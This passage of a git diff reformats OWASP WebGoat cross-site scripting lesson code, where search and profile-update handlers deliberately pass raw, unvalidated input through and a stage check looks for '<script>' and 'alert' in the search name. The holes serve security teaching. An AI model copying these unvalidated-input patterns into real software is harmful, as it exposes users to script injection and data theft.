+									.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
+									.getString("disciplined_notes"), answer_results.getString("personal_description"));
+					/*
+					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
+					 * profile.getLastName() + " (" + profile.getId() + ")");
+					 */}
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error getting employee profile");
+				sqle.printStackTrace();
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error getting employee profile");
+			e.printStackTrace();
+		}
+
+		return profile;
 	}
 
-	return profile;
-    }
+	public Employee getEmployeeProfile_BACKUP(WebSession s, int userId, int subjectUserId) throws UnauthorizedException
+	{
+		Employee profile = null;
+
+		// Query the database for the profile data of the given employee
+		try
+		{
+			String query = "SELECT * FROM employee WHERE userid = ?";
+
+			try
+			{
+				PreparedStatement answer_statement = WebSession.getConnection(s)
+						.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+				answer_statement.setInt(1, subjectUserId);
+				ResultSet answer_results = answer_statement.executeQuery();
+				if (answer_results.next())
+				{
+					// Note: Do NOT get the password field.
+					profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"),
+							answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results
+									.getString("title"), answer_results.getString("phone"), answer_results
+									.getString("address1"), answer_results.getString("address2"), answer_results
+									.getInt("manager"), answer_results.getString("start_date"), answer_results
+									.getInt("salary"), answer_results.getString("ccn"), answer_results
+									.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
+									.getString("disciplined_notes"), answer_results.getString("personal_description"));
+					/*
+					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
+					 * profile.getLastName() + " (" + profile.getId() + ")");
+					 */}
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error getting employee profile");
+				sqle.printStackTrace();
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error getting employee profile");
+			e.printStackTrace();
+		}
+
+		return profile;
+	}
 
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/FindProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/FindProfile.java
index 42bc14f07..c240cde80 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/FindProfile.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/FindProfile.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons.CrossSiteScripting;
 
 import java.sql.PreparedStatement;
@@ -7,7 +8,6 @@ import java.util.HashMap;
 import java.util.Map;
 import java.util.regex.Matcher;
 import java.util.regex.Pattern;
-
 import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
 import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
 import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
@@ -18,239 +18,202 @@ import org.owasp.webgoat.session.UnauthorizedException;
 import org.owasp.webgoat.session.ValidationException;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  */
 public class FindProfile extends DefaultLessonAction
 {
 
-    private LessonAction chainedAction;
+	private LessonAction chainedAction;
 
-
-    public FindProfile(GoatHillsFinancial lesson, String lessonName,
-	    String actionName, LessonAction chainedAction)
-    {
-	super(lesson, lessonName, actionName);
-	this.chainedAction = chainedAction;
-    }
-
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException,
-	    UnauthenticatedException, UnauthorizedException,
-	    ValidationException
-    {
-	if (isAuthenticated(s))
+	public FindProfile(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
 	{
-	    int userId = getIntSessionAttribute(s, getLessonName() + "."
-		    + CrossSiteScripting.USER_ID);
+		super(lesson, lessonName, actionName);
+		this.chainedAction = chainedAction;
+	}
 
-	    String searchName = null;
-	    try
-	    {
-		searchName = getRequestParameter(s,
-			CrossSiteScripting.SEARCHNAME);
-
-		Employee employee = null;
-
-		employee = findEmployeeProfile(s, userId, searchName);
-		if (employee == null)
+	public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
+			UnauthorizedException, ValidationException
+	{
+		if (isAuthenticated(s))
 		{
-		    setSessionAttribute(s, getLessonName() + "."
-			    + CrossSiteScripting.SEARCHRESULT_ATTRIBUTE_KEY,
-			    "Employee " + searchName + " not found.");
-		}
-	    }
-	    catch (ValidationException e)
-	    {
-		if (CrossSiteScripting.STAGE6.equals(getStage(s)))
-		{
-		    setStageComplete(s, CrossSiteScripting.STAGE6);
-		}
-		throw e;
-	    }
+			int userId = getIntSessionAttribute(s, getLessonName() + "." + CrossSiteScripting.USER_ID);
 
-	    if (CrossSiteScripting.STAGE5.equals(getStage(s)))
-	    {
-		if (searchName.indexOf("<script>") > -1
-			&& searchName.indexOf("alert") > -1
-			&& searchName.indexOf("</script>") > -1)
-		{
-		    setStageComplete(s, CrossSiteScripting.STAGE5);
-		}
-	    }
+			String searchName = null;
+			try
+			{
+				searchName = getRequestParameter(s, CrossSiteScripting.SEARCHNAME);
 
-	    // Execute the chained Action if the employee was found.
-	    if (foundEmployee(s))
-	    {
+				Employee employee = null;
+
+				employee = findEmployeeProfile(s, userId, searchName);
+				if (employee == null)
+				{
+					setSessionAttribute(s, getLessonName() + "." + CrossSiteScripting.SEARCHRESULT_ATTRIBUTE_KEY,
+										"Employee " + searchName + " not found.");
+				}
+			} catch (ValidationException e)
+			{
+				if (CrossSiteScripting.STAGE6.equals(getStage(s)))
+				{
+					setStageComplete(s, CrossSiteScripting.STAGE6);
+				}
+				throw e;
+			}
+
+			if (CrossSiteScripting.STAGE5.equals(getStage(s)))
+			{
+				if (searchName.indexOf("<script>") > -1 && searchName.indexOf("alert") > -1
+						&& searchName.indexOf("</script>") > -1)
+				{
+					setStageComplete(s, CrossSiteScripting.STAGE5);
+				}
+			}
+
+			// Execute the chained Action if the employee was found.
+			if (foundEmployee(s))
+			{
+				try
+				{
+					chainedAction.handleRequest(s);
+				} catch (UnauthenticatedException ue1)
+				{
+					System.out.println("Internal server error");
+					ue1.printStackTrace();
+				} catch (UnauthorizedException ue2)
+				{
+					System.out.println("Internal server error");
+					ue2.printStackTrace();
+				}
+			}
+		}
+		else
+			throw new UnauthenticatedException();
+	}
+
+	public String getNextPage(WebSession s)
+	{
+		String page = CrossSiteScripting.SEARCHSTAFF_ACTION;
+
+		if (foundEmployee(s)) page = CrossSiteScripting.VIEWPROFILE_ACTION;
+
+		return page;
+	}
+
+	protected String getRequestParameter(WebSession s, String name) throws ParameterNotFoundException,
+			ValidationException
+	{
+		return s.getParser().getRawParameter(name);
+	}
+
+	protected String getRequestParameter_BACKUP(WebSession s, String name) throws ParameterNotFoundException,
+			ValidationException
+	{
+		return s.getParser().getRawParameter(name);
+	}
+
+	public Employee findEmployeeProfile(WebSession s, int userId, String pattern) throws UnauthorizedException
+	{
+		Employee profile = null;
+
+		// Query the database for the profile data of the given employee
 		try
 		{
-		    chainedAction.handleRequest(s);
-		}
-		catch (UnauthenticatedException ue1)
+			String query = "SELECT * FROM employee WHERE first_name like ? OR last_name like ?";
+
+			try
+			{
+				PreparedStatement answer_statement = WebSession.getConnection(s)
+						.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+				answer_statement.setString(1, "%" + pattern + "%");
+				answer_statement.setString(2, "%" + pattern + "%");
+				ResultSet answer_results = answer_statement.executeQuery();
+
+				// Just use the first hit.
+				if (answer_results.next())
+				{
+					int id = answer_results.getInt("userid");
+					// Note: Do NOT get the password field.
+					profile = new Employee(id, answer_results.getString("first_name"), answer_results
+							.getString("last_name"), answer_results.getString("ssn"),
+							answer_results.getString("title"), answer_results.getString("phone"), answer_results
+									.getString("address1"), answer_results.getString("address2"), answer_results
+									.getInt("manager"), answer_results.getString("start_date"), answer_results
+									.getInt("salary"), answer_results.getString("ccn"), answer_results
+									.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
+									.getString("disciplined_notes"), answer_results.getString("personal_description"));
+
+					/*
+					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
+					 * profile.getLastName() + " (" + profile.getId() + ")");
+					 */
+					setRequestAttribute(s, getLessonName() + "." + CrossSiteScripting.EMPLOYEE_ID, Integer.toString(id));
+				}
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error finding employee profile");
+				sqle.printStackTrace();
+			}
+		} catch (Exception e)
 		{
-		    System.out.println("Internal server error");
-		    ue1.printStackTrace();
+			s.setMessage("Error finding employee profile");
+			e.printStackTrace();
 		}
-		catch (UnauthorizedException ue2)
+
+		return profile;
+	}
+
+	private boolean foundEmployee(WebSession s)
+	{
+		boolean found = false;
+		try
 		{
-		    System.out.println("Internal server error");
-		    ue2.printStackTrace();
-		}
-	    }
-	}
-	else
-	    throw new UnauthenticatedException();
-    }
-
-
-    public String getNextPage(WebSession s)
-    {
-	String page = CrossSiteScripting.SEARCHSTAFF_ACTION;
-
-	if (foundEmployee(s))
-	    page = CrossSiteScripting.VIEWPROFILE_ACTION;
-
-	return page;
-    }
-
-
-    protected String getRequestParameter(WebSession s, String name)
-	    throws ParameterNotFoundException, ValidationException
-    {
-	return s.getParser().getRawParameter(name);
-    }
-
-
-    protected String getRequestParameter_BACKUP(WebSession s, String name)
-	    throws ParameterNotFoundException, ValidationException
-    {
-	return s.getParser().getRawParameter(name);
-    }
-
-
-    public Employee findEmployeeProfile(WebSession s, int userId, String pattern)
-	    throws UnauthorizedException
-    {
-	Employee profile = null;
-
-	// Query the database for the profile data of the given employee
-	try
-	{
-	    String query = "SELECT * FROM employee WHERE first_name like ? OR last_name like ?";
-
-	    try
-	    {
-		PreparedStatement answer_statement = WebSession
-			.getConnection(s).prepareStatement(query,
-				ResultSet.TYPE_SCROLL_INSENSITIVE,
-				ResultSet.CONCUR_READ_ONLY);
-		answer_statement.setString(1, "%" + pattern + "%");
-		answer_statement.setString(2, "%" + pattern + "%");
-		ResultSet answer_results = answer_statement.executeQuery();
-
-		// Just use the first hit.
-		if (answer_results.next())
+			getIntRequestAttribute(s, getLessonName() + "." + CrossSiteScripting.EMPLOYEE_ID);
+			found = true;
+		} catch (ParameterNotFoundException e)
 		{
-		    int id = answer_results.getInt("userid");
-		    // Note: Do NOT get the password field.
-		    profile = new Employee(id, answer_results
-			    .getString("first_name"), answer_results
-			    .getString("last_name"), answer_results
-			    .getString("ssn"), answer_results
-			    .getString("title"), answer_results
-			    .getString("phone"), answer_results
-			    .getString("address1"), answer_results
-			    .getString("address2"), answer_results
-			    .getInt("manager"), answer_results
-			    .getString("start_date"), answer_results
-			    .getInt("salary"), answer_results.getString("ccn"),
-			    answer_results.getInt("ccn_limit"), answer_results
-				    .getString("disciplined_date"),
-			    answer_results.getString("disciplined_notes"),
-			    answer_results.getString("personal_description"));
-
-		    /*					System.out.println("Retrieved employee from db: " + 
-		     profile.getFirstName() + " " + profile.getLastName() + 
-		     " (" + profile.getId() + ")");
-		     */
-		    setRequestAttribute(s, getLessonName() + "."
-			    + CrossSiteScripting.EMPLOYEE_ID, Integer
-			    .toString(id));
 		}
-	    }
-	    catch (SQLException sqle)
-	    {
-		s.setMessage("Error finding employee profile");
-		sqle.printStackTrace();
-	    }
+
+		return found;
 	}
-	catch (Exception e)
+
+	protected String validate(final String parameter, final Pattern pattern) throws ValidationException
 	{
-	    s.setMessage("Error finding employee profile");
-	    e.printStackTrace();
+		Matcher matcher = pattern.matcher(parameter);
+		if (!matcher.matches()) throw new ValidationException();
+
+		return parameter;
 	}
 
-	return profile;
-    }
-
-
-    private boolean foundEmployee(WebSession s)
-    {
-	boolean found = false;
-	try
+	protected static Map<String, Pattern> patterns = new HashMap<String, Pattern>();
+	static
 	{
-	    getIntRequestAttribute(s, getLessonName() + "."
-		    + CrossSiteScripting.EMPLOYEE_ID);
-	    found = true;
+		patterns.put(CrossSiteScripting.SEARCHNAME, Pattern.compile("[a-zA-Z ]{0,20}"));
 	}
-	catch (ParameterNotFoundException e)
-	{}
-
-	return found;
-    }
-
-
-    protected String validate(final String parameter, final Pattern pattern)
-	    throws ValidationException
-    {
-	Matcher matcher = pattern.matcher(parameter);
-	if (!matcher.matches())
-	    throw new ValidationException();
-
-	return parameter;
-    }
-
-    protected static Map<String, Pattern> patterns = new HashMap<String, Pattern>();
-    static
-    {
-	patterns.put(CrossSiteScripting.SEARCHNAME, Pattern
-		.compile("[a-zA-Z ]{0,20}"));
-    }
 
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/UpdateProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/UpdateProfile.java
index 157a0e8b4..449247e36 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/UpdateProfile.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/UpdateProfile.java
@@ -1,14 +1,13 @@
+
 package org.owasp.webgoat.lessons.CrossSiteScripting;
 
 import java.sql.ResultSet;
 import java.sql.SQLException;
-import java.sql.PreparedStatement;
+import java.sql.PreparedStatement;
 import java.sql.Statement;
 import java.util.regex.Matcher;
 import java.util.regex.Pattern;
-
 import javax.servlet.http.HttpServletRequest;
-
 import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
 import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
 import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
@@ -20,417 +19,370 @@ import org.owasp.webgoat.session.UnauthorizedException;
 import org.owasp.webgoat.session.ValidationException;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  */
 public class UpdateProfile extends DefaultLessonAction
 {
 
-    private LessonAction chainedAction;
+	private LessonAction chainedAction;
 
-
-    public UpdateProfile(GoatHillsFinancial lesson, String lessonName,
-	    String actionName, LessonAction chainedAction)
-    {
-	super(lesson, lessonName, actionName);
-	this.chainedAction = chainedAction;
-    }
-
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException,
-	    UnauthenticatedException, UnauthorizedException,
-	    ValidationException
-    {
-	if (isAuthenticated(s))
+	public UpdateProfile(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
 	{
-	    int userId = getIntSessionAttribute(s, getLessonName() + "."
-		    + CrossSiteScripting.USER_ID);
+		super(lesson, lessonName, actionName);
+		this.chainedAction = chainedAction;
+	}
 
-	    int subjectId = s.getParser().getIntParameter(
-		    CrossSiteScripting.EMPLOYEE_ID, 0);
-
-	    Employee employee = null;
-	    try
-	    {
-		employee = parseEmployeeProfile(subjectId, s);
-	    }
-	    catch (ValidationException e)
-	    {
-		if (CrossSiteScripting.STAGE2.equals(getStage(s)))
+	public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
+			UnauthorizedException, ValidationException
+	{
+		if (isAuthenticated(s))
 		{
-		    setStageComplete(s, CrossSiteScripting.STAGE2);
+			int userId = getIntSessionAttribute(s, getLessonName() + "." + CrossSiteScripting.USER_ID);
+
+			int subjectId = s.getParser().getIntParameter(CrossSiteScripting.EMPLOYEE_ID, 0);
+
+			Employee employee = null;
+			try
+			{
+				employee = parseEmployeeProfile(subjectId, s);
+			} catch (ValidationException e)
+			{
+				if (CrossSiteScripting.STAGE2.equals(getStage(s)))
+				{
+					setStageComplete(s, CrossSiteScripting.STAGE2);
+				}
+				throw e;
+			}
+
+			if (subjectId > 0)
+			{
+				this.changeEmployeeProfile(s, userId, subjectId, employee);
+				setRequestAttribute(s, getLessonName() + "." + CrossSiteScripting.EMPLOYEE_ID, Integer
+						.toString(subjectId));
+			}
+			else
+				this.createEmployeeProfile(s, userId, employee);
+
+			try
+			{
+				chainedAction.handleRequest(s);
+			} catch (UnauthenticatedException ue1)
+			{
+				System.out.println("Internal server error");
+				ue1.printStackTrace();
+			} catch (UnauthorizedException ue2)
+			{
+				System.out.println("Internal server error");
+				ue2.printStackTrace();
+			}
 		}
-		throw e;
-	    }
-
-	    if (subjectId > 0)
-	    {
-		this.changeEmployeeProfile(s, userId, subjectId, employee);
-		setRequestAttribute(s, getLessonName() + "."
-			+ CrossSiteScripting.EMPLOYEE_ID, Integer
-			.toString(subjectId));
-	    }
-	    else
-		this.createEmployeeProfile(s, userId, employee);
-
-	    try
-	    {
-		chainedAction.handleRequest(s);
-	    }
-	    catch (UnauthenticatedException ue1)
-	    {
-		System.out.println("Internal server error");
-		ue1.printStackTrace();
-	    }
-	    catch (UnauthorizedException ue2)
-	    {
-		System.out.println("Internal server error");
-		ue2.printStackTrace();
-	    }
+		else
+			throw new UnauthenticatedException();
 	}
-	else
-	    throw new UnauthenticatedException();
-    }
 
-
-    protected Employee parseEmployeeProfile(int subjectId, WebSession s)
-	    throws ParameterNotFoundException, ValidationException
-    {
-	// The input validation can be added using a parsing component 
-	// or by using an inline regular expression. The parsing component 
-	// is the better solution.
-
-	HttpServletRequest request = s.getRequest();
-	String firstName = request.getParameter(CrossSiteScripting.FIRST_NAME);
-	String lastName = request.getParameter(CrossSiteScripting.LAST_NAME);
-	String ssn = request.getParameter(CrossSiteScripting.SSN);
-	String title = request.getParameter(CrossSiteScripting.TITLE);
-	String phone = request.getParameter(CrossSiteScripting.PHONE_NUMBER);
-	String address1 = request.getParameter(CrossSiteScripting.ADDRESS1);
-	String address2 = request.getParameter(CrossSiteScripting.ADDRESS2);
-	int manager = Integer.parseInt(request
-		.getParameter(CrossSiteScripting.MANAGER));
-	String startDate = request.getParameter(CrossSiteScripting.START_DATE);
-	int salary = Integer.parseInt(request
-		.getParameter(CrossSiteScripting.SALARY));
-	String ccn = request.getParameter(CrossSiteScripting.CCN);
-	int ccnLimit = Integer.parseInt(request
-		.getParameter(CrossSiteScripting.CCN_LIMIT));
-	String disciplinaryActionDate = request
-		.getParameter(CrossSiteScripting.DISCIPLINARY_DATE);
-	String disciplinaryActionNotes = request
-		.getParameter(CrossSiteScripting.DISCIPLINARY_NOTES);
-	String personalDescription = request
-		.getParameter(CrossSiteScripting.DESCRIPTION);
-
-	Employee employee = new Employee(subjectId, firstName, lastName, ssn,
-		title, phone, address1, address2, manager, startDate, salary,
-		ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes,
-		personalDescription);
-
-	return employee;
-    }
-
-
-    protected Employee parseEmployeeProfile_BACKUP(int subjectId, WebSession s)
-	    throws ParameterNotFoundException, ValidationException
-    {
-	// The input validation can be added using a parsing component 
-	// or by using an inline regular expression. The parsing component 
-	// is the better solution.
-
-	HttpServletRequest request = s.getRequest();
-	String firstName = request.getParameter(CrossSiteScripting.FIRST_NAME);
-	String lastName = request.getParameter(CrossSiteScripting.LAST_NAME);
-	String ssn = request.getParameter(CrossSiteScripting.SSN);
-	String title = request.getParameter(CrossSiteScripting.TITLE);
-	String phone = request.getParameter(CrossSiteScripting.PHONE_NUMBER);
-	String address1 = request.getParameter(CrossSiteScripting.ADDRESS1);
-	String address2 = request.getParameter(CrossSiteScripting.ADDRESS2);
-	int manager = Integer.parseInt(request
-		.getParameter(CrossSiteScripting.MANAGER));
-	String startDate = request.getParameter(CrossSiteScripting.START_DATE);
-	int salary = Integer.parseInt(request
-		.getParameter(CrossSiteScripting.SALARY));
-	String ccn = request.getParameter(CrossSiteScripting.CCN);
-	int ccnLimit = Integer.parseInt(request
-		.getParameter(CrossSiteScripting.CCN_LIMIT));
-	String disciplinaryActionDate = request
-		.getParameter(CrossSiteScripting.DISCIPLINARY_DATE);
-	String disciplinaryActionNotes = request
-		.getParameter(CrossSiteScripting.DISCIPLINARY_NOTES);
-	String personalDescription = request
-		.getParameter(CrossSiteScripting.DESCRIPTION);
-
-	Employee employee = new Employee(subjectId, firstName, lastName, ssn,
-		title, phone, address1, address2, manager, startDate, salary,
-		ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes,
-		personalDescription);
-
-	return employee;
-    }
-
-
-    protected Employee doParseEmployeeProfile(int subjectId,
-	    ParameterParser parser) throws ParameterNotFoundException,
-	    ValidationException
-    {
-	// Fix this method using the org.owasp.webgoat.session.ParameterParser class 
-	return null;
-    }
-
-
-    public String getNextPage(WebSession s)
-    {
-	return CrossSiteScripting.VIEWPROFILE_ACTION;
-    }
-
-
-    public void changeEmployeeProfile(WebSession s, int userId, int subjectId,
-	    Employee employee) throws UnauthorizedException
-    {
-	try
+	protected Employee parseEmployeeProfile(int subjectId, WebSession s) throws ParameterNotFoundException,
+			ValidationException
 	{
-	    // Note: The password field is ONLY set by ChangePassword
-			String query = "UPDATE employee SET first_name = ?, last_name = ?, ssn = ?, title = ?, phone = ?, address1 = ?, address2 = ?,"
-				+ " manager = ?, start_date = ?, ccn = ?, ccn_limit = ?,"
-				+ " personal_description = ? WHERE userid = ?;";
-	    try
-	    {
-			PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-
-			ps.setString(1, employee.getFirstName());
-			ps.setString(2, employee.getLastName());
-			ps.setString(3, employee.getSsn());
-			ps.setString(4, employee.getTitle());
-			ps.setString(5, employee.getPhoneNumber());
-			ps.setString(6, employee.getAddress1());
-			ps.setString(7, employee.getAddress2());
-			ps.setInt(8, employee.getManager());
-			ps.setString(9, employee.getStartDate());
-			ps.setString(10, employee.getCcn());
-			ps.setInt(11, employee.getCcnLimit());
-			ps.setString(12, employee.getPersonalDescription());
-			ps.setInt(13, subjectId);
-			ps.execute();
-	    }
-	    catch (SQLException sqle)
-	    {
-		s.setMessage("Error updating employee profile");
-		sqle.printStackTrace();
-	    }
+		// The input validation can be added using a parsing component
+		// or by using an inline regular expression. The parsing component
+		// is the better solution.
 
+		HttpServletRequest request = s.getRequest();
+		String firstName = request.getParameter(CrossSiteScripting.FIRST_NAME);
+		String lastName = request.getParameter(CrossSiteScripting.LAST_NAME);
+		String ssn = request.getParameter(CrossSiteScripting.SSN);
+		String title = request.getParameter(CrossSiteScripting.TITLE);
+		String phone = request.getParameter(CrossSiteScripting.PHONE_NUMBER);
+		String address1 = request.getParameter(CrossSiteScripting.ADDRESS1);
+		String address2 = request.getParameter(CrossSiteScripting.ADDRESS2);
+		int manager = Integer.parseInt(request.getParameter(CrossSiteScripting.MANAGER));
+		String startDate = request.getParameter(CrossSiteScripting.START_DATE);
+		int salary = Integer.parseInt(request.getParameter(CrossSiteScripting.SALARY));
+		String ccn = request.getParameter(CrossSiteScripting.CCN);
+		int ccnLimit = Integer.parseInt(request.getParameter(CrossSiteScripting.CCN_LIMIT));
+		String disciplinaryActionDate = request.getParameter(CrossSiteScripting.DISCIPLINARY_DATE);
+		String disciplinaryActionNotes = request.getParameter(CrossSiteScripting.DISCIPLINARY_NOTES);
+		String personalDescription = request.getParameter(CrossSiteScripting.DESCRIPTION);
+
+		Employee employee = new Employee(subjectId, firstName, lastName, ssn, title, phone, address1, address2,
+				manager, startDate, salary, ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes,
+				personalDescription);
+
+		return employee;
 	}
-	catch (Exception e)
+
+	protected Employee parseEmployeeProfile_BACKUP(int subjectId, WebSession s) throws ParameterNotFoundException,
+			ValidationException
 	{
-	    s.setMessage("Error updating employee profile");
-	    e.printStackTrace();
+		// The input validation can be added using a parsing component
+		// or by using an inline regular expression. The parsing component
+		// is the better solution.
+
+		HttpServletRequest request = s.getRequest();
+		String firstName = request.getParameter(CrossSiteScripting.FIRST_NAME);
+		String lastName = request.getParameter(CrossSiteScripting.LAST_NAME);
+		String ssn = request.getParameter(CrossSiteScripting.SSN);
+		String title = request.getParameter(CrossSiteScripting.TITLE);
+		String phone = request.getParameter(CrossSiteScripting.PHONE_NUMBER);
+		String address1 = request.getParameter(CrossSiteScripting.ADDRESS1);
+		String address2 = request.getParameter(CrossSiteScripting.ADDRESS2);
+		int manager = Integer.parseInt(request.getParameter(CrossSiteScripting.MANAGER));
+		String startDate = request.getParameter(CrossSiteScripting.START_DATE);
+		int salary = Integer.parseInt(request.getParameter(CrossSiteScripting.SALARY));
+		String ccn = request.getParameter(CrossSiteScripting.CCN);
+		int ccnLimit = Integer.parseInt(request.getParameter(CrossSiteScripting.CCN_LIMIT));
+		String disciplinaryActionDate = request.getParameter(CrossSiteScripting.DISCIPLINARY_DATE);
+		String disciplinaryActionNotes = request.getParameter(CrossSiteScripting.DISCIPLINARY_NOTES);
+		String personalDescription = request.getParameter(CrossSiteScripting.DESCRIPTION);
+
+		Employee employee = new Employee(subjectId, firstName, lastName, ssn, title, phone, address1, address2,
+				manager, startDate, salary, ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes,
+				personalDescription);
+
+		return employee;
 	}
-    }
 
-
-    public void doChangeEmployeeProfile_BACKUP(WebSession s, int userId,
-	    int subjectId, Employee employee) throws UnauthorizedException
-    {
-	try
+	protected Employee doParseEmployeeProfile(int subjectId, ParameterParser parser) throws ParameterNotFoundException,
+			ValidationException
 	{
-	    // Note: The password field is ONLY set by ChangePassword
-			String query = "UPDATE employee SET first_name = ?, last_name = ?, ssn = ?, title = ?, phone = ?, address1 = ?, address2 = ?,"
-				+ " manager = ?, start_date = ?, ccn = ?, ccn_limit = ?,"
-				+ " personal_description = ? WHERE userid = ?;";
-	    try
-	    {
-			PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-
-			ps.setString(1, employee.getFirstName());
-			ps.setString(2, employee.getLastName());
-			ps.setString(3, employee.getSsn());
-			ps.setString(4, employee.getTitle());
-			ps.setString(5, employee.getPhoneNumber());
-			ps.setString(6, employee.getAddress1());
-			ps.setString(7, employee.getAddress2());
-			ps.setInt(8, employee.getManager());
-			ps.setString(9, employee.getStartDate());
-			ps.setString(10, employee.getCcn());
-			ps.setInt(11, employee.getCcnLimit());
-			ps.setString(12, employee.getPersonalDescription());
-			ps.setInt(13, subjectId);
-			ps.executeUpdate(query);
-	    }
-	    catch (SQLException sqle)
-	    {
-		s.setMessage("Error updating employee profile");
-		sqle.printStackTrace();
-	    }
-
+		// Fix this method using the org.owasp.webgoat.session.ParameterParser class
+		return null;
 	}
-	catch (Exception e)
+
+	public String getNextPage(WebSession s)
 	{
-	    s.setMessage("Error updating employee profile");
-	    e.printStackTrace();
+		return CrossSiteScripting.VIEWPROFILE_ACTION;
 	}
-    }
 
-
-    public void createEmployeeProfile(WebSession s, int userId,
-	    Employee employee) throws UnauthorizedException
-    {
-	try
